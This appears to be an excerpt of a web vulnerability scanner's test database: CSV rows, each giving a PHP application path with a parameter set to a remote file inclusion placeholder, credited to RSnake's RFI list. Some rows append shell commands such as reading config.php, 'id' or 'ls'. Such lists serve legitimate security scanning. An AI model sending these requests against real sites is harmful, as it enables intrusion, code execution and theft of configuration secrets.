"005731","https://gist.github.com/mubix/5d269c686584875015a2","c","/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005732","https://gist.github.com/mubix/5d269c686584875015a2","c","/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005733","https://gist.github.com/mubix/5d269c686584875015a2","c","/sample/xls2mysql/parser_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005734","https://gist.github.com/mubix/5d269c686584875015a2","c","/save.php?file_save=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005735","https://gist.github.com/mubix/5d269c686584875015a2","c","/saveserver.php?thisdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005736","https://gist.github.com/mubix/5d269c686584875015a2","c","/script//ident/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005737","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/_conf/core/common-tpl-vars.php?confdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005738","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/common.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005739","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/gestion/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005740","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/ident/disconnect.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005741","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/ident/ident.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005742","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/ident/identification.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005743","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/ident/loginliste.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005744","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/ident/loginmodif.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005745","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005746","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/init/createallimagecache.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005747","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/menu/menuadministration.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005748","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/menu/menuprincipal.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005749","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/param/param.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005750","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/plugins/phpgacl/admin/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005751","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/template/index.php?main_page_directory=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005752","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005753","https://gist.github.com/mubix/5d269c686584875015a2","c","/script/tick/test.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005754","https://gist.github.com/mubix/5d269c686584875015a2","c","/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005755","https://gist.github.com/mubix/5d269c686584875015a2","c","/script_path/cms/classes/openengine/filepool.php?oe_classpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005756","https://gist.github.com/mubix/5d269c686584875015a2","c","/script_path/installation/index.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005757","https://gist.github.com/mubix/5d269c686584875015a2","c","/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005758","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/check-lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005759","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/gallery.scr.php?GLOBALS[PTH][func]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005760","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/lom_update.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005761","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/news.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005762","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/polls.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005763","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/rss.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005764","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/search.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005765","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005766","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005767","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/weigh_keywords.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005768","https://gist.github.com/mubix/5d269c686584875015a2","c","/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005769","https://gist.github.com/mubix/5d269c686584875015a2","c","/search.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005770","https://gist.github.com/mubix/5d269c686584875015a2","c","/search.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005771","https://gist.github.com/mubix/5d269c686584875015a2","c","/search.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005772","https://gist.github.com/mubix/5d269c686584875015a2","c","/search/submit.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005773","https://gist.github.com/mubix/5d269c686584875015a2","c","/search_wA.php?LIBPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005774","https://gist.github.com/mubix/5d269c686584875015a2","c","/searchbot.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005775","https://gist.github.com/mubix/5d269c686584875015a2","c","/security/include/_class.security.php?PHPSECURITYADMIN_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005776","https://gist.github.com/mubix/5d269c686584875015a2","c","/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005777","https://gist.github.com/mubix/5d269c686584875015a2","c","/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005778","https://gist.github.com/mubix/5d269c686584875015a2","c","/senetman/html/index.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005779","https://gist.github.com/mubix/5d269c686584875015a2","c","/services.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005780","https://gist.github.com/mubix/5d269c686584875015a2","c","/services/samples/inclusionService.php?CabronServiceFolder=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005781","https://gist.github.com/mubix/5d269c686584875015a2","c","/settings.php?P[includes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005782","https://gist.github.com/mubix/5d269c686584875015a2","c","/settings_sql.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005783","https://gist.github.com/mubix/5d269c686584875015a2","c","/setup/inc/database.php?tcms_administer_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005784","https://gist.github.com/mubix/5d269c686584875015a2","c","/setup/upgrader.php?RootDirectory=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005785","https://gist.github.com/mubix/5d269c686584875015a2","c","/sezhoo/SezHooTabsAndActions.php?IP=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005786","https://gist.github.com/mubix/5d269c686584875015a2","c","/shop/includes/header.inc.php?dateiPfad=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005787","https://gist.github.com/mubix/5d269c686584875015a2","c","/shop/index.php?action=@RFIURL?&cmd=cat%20config.php","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005788","https://gist.github.com/mubix/5d269c686584875015a2","c","/shop/page.php?osCsid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005789","https://gist.github.com/mubix/5d269c686584875015a2","c","/shop/page.php?pageid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005790","https://gist.github.com/mubix/5d269c686584875015a2","c","/shoutbox.php?language=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005791","https://gist.github.com/mubix/5d269c686584875015a2","c","/shoutbox.php?root=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005792","https://gist.github.com/mubix/5d269c686584875015a2","c","/show.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005793","https://gist.github.com/mubix/5d269c686584875015a2","c","/show.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005794","https://gist.github.com/mubix/5d269c686584875015a2","c","/show.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005795","https://gist.github.com/mubix/5d269c686584875015a2","c","/show.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005796","https://gist.github.com/mubix/5d269c686584875015a2","c","/show_archives.php?cutepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005797","https://gist.github.com/mubix/5d269c686584875015a2","c","/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005798","https://gist.github.com/mubix/5d269c686584875015a2","c","/sid=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005799","https://gist.github.com/mubix/5d269c686584875015a2","c","/signer/final.php?smiley=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005800","https://gist.github.com/mubix/5d269c686584875015a2","c","/signin.php?sent=1&AMG_serverpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005801","https://gist.github.com/mubix/5d269c686584875015a2","c","/sinagb.php?fuss=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005802","https://gist.github.com/mubix/5d269c686584875015a2","c","/sinapis.php?fuss=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005803","https://gist.github.com/mubix/5d269c686584875015a2","c","/sitebar/Integrator.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005804","https://gist.github.com/mubix/5d269c686584875015a2","c","/sitebar/index.php?writerFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005805","https://gist.github.com/mubix/5d269c686584875015a2","c","/sitebuilder/admin/top.php?admindir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005806","https://gist.github.com/mubix/5d269c686584875015a2","c","/sitemap.xml.php?dir[classes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005807","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin/board/default/doctype.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005808","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin/dark/template.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005809","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin/gold/template.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005810","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin/html/table.php?pachtofile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005811","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin/original/template.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005812","https://gist.github.com/mubix/5d269c686584875015a2","c","/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005813","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/advanced/advanced1.php?pluginpath[0]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005814","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/default.php?dir_inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005815","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/header.php?ote_home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005816","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/phpchess/layout_admin_cfg.php?Root_Path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005817","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/phpchess/layout_cfg.php?Root_Path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005818","https://gist.github.com/mubix/5d269c686584875015a2","c","/skins/phpchess/layout_t_top.php?Root_Path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005819","https://gist.github.com/mubix/5d269c686584875015a2","c","/skysilver/login.tpl.php?theme=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005820","https://gist.github.com/mubix/5d269c686584875015a2","c","/slogin_lib.inc.php?slogin_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005821","https://gist.github.com/mubix/5d269c686584875015a2","c","/slogin_lib.inc.php?slogin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005822","https://gist.github.com/mubix/5d269c686584875015a2","c","/smarty.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005823","https://gist.github.com/mubix/5d269c686584875015a2","c","/smarty.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005824","https://gist.github.com/mubix/5d269c686584875015a2","c","/smarty/smarty_class.php?_smarty_compile_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005825","https://gist.github.com/mubix/5d269c686584875015a2","c","/smilies.php?config=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005826","https://gist.github.com/mubix/5d269c686584875015a2","c","/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005827","https://gist.github.com/mubix/5d269c686584875015a2","c","/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005828","https://gist.github.com/mubix/5d269c686584875015a2","c","/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005829","https://gist.github.com/mubix/5d269c686584875015a2","c","/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005830","https://gist.github.com/mubix/5d269c686584875015a2","c","/snort/base_stat_common.php?BASE_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005831","https://gist.github.com/mubix/5d269c686584875015a2","c","/social_game_play.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005832","https://gist.github.com/mubix/5d269c686584875015a2","c","/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005833","https://gist.github.com/mubix/5d269c686584875015a2","c","/song.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005834","https://gist.github.com/mubix/5d269c686584875015a2","c","/source.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005835","https://gist.github.com/mubix/5d269c686584875015a2","c","/source/mod/rss/channeledit.php?Codebase=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005836","https://gist.github.com/mubix/5d269c686584875015a2","c","/source/mod/rss/post.php?Codebase=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005837","https://gist.github.com/mubix/5d269c686584875015a2","c","/source/mod/rss/view.php?Codebase=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005838","https://gist.github.com/mubix/5d269c686584875015a2","c","/source/mod/rss/viewitem.php?Codebase=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005839","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/Admin/admin_cats.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005840","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/Admin/admin_edit.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005841","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/Admin/admin_import.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005842","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005843","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005844","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005845","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005846","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005847","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005848","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005849","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005850","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/news.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005851","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/post.php?fil_config=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005852","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/template.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005853","https://gist.github.com/mubix/5d269c686584875015a2","c","/sources/tourney/index.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005854","https://gist.github.com/mubix/5d269c686584875015a2","c","/spaw/spaw_control.class.php?GLOBALS[spaw_root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005855","https://gist.github.com/mubix/5d269c686584875015a2","c","/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005856","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005857","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005858","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005859","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005860","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005861","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005862","https://gist.github.com/mubix/5d269c686584875015a2","c","/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005863","https://gist.github.com/mubix/5d269c686584875015a2","c","/spellcheckwindowframeset.php?SpellIncPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005864","https://gist.github.com/mubix/5d269c686584875015a2","c","/squirrelcart/cart_content.php?cart_isp_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005865","https://gist.github.com/mubix/5d269c686584875015a2","c","/src/ark_inc.php?cfg_pear_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005866","https://gist.github.com/mubix/5d269c686584875015a2","c","/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005867","https://gist.github.com/mubix/5d269c686584875015a2","c","/src/scripture.php?pageHeaderFile=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005868","https://gist.github.com/mubix/5d269c686584875015a2","c","/starnet/themes/c-sky/main.inc.php?cmsdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005869","https://gist.github.com/mubix/5d269c686584875015a2","c","/start.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005870","https://gist.github.com/mubix/5d269c686584875015a2","c","/start.php?pg=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005871","https://gist.github.com/mubix/5d269c686584875015a2","c","/stat_modules/users_age/module.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005872","https://gist.github.com/mubix/5d269c686584875015a2","c","/stats.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005873","https://gist.github.com/mubix/5d269c686584875015a2","c","/stats.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005874","https://gist.github.com/mubix/5d269c686584875015a2","c","/stphpapplication.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005875","https://gist.github.com/mubix/5d269c686584875015a2","c","/stphpbtnimage.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005876","https://gist.github.com/mubix/5d269c686584875015a2","c","/stphpform.php?STPHPLIB_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005877","https://gist.github.com/mubix/5d269c686584875015a2","c","/str.php?p=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005878","https://gist.github.com/mubix/5d269c686584875015a2","c","/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005879","https://gist.github.com/mubix/5d269c686584875015a2","c","/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005880","https://gist.github.com/mubix/5d269c686584875015a2","c","/strload.php?LangFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 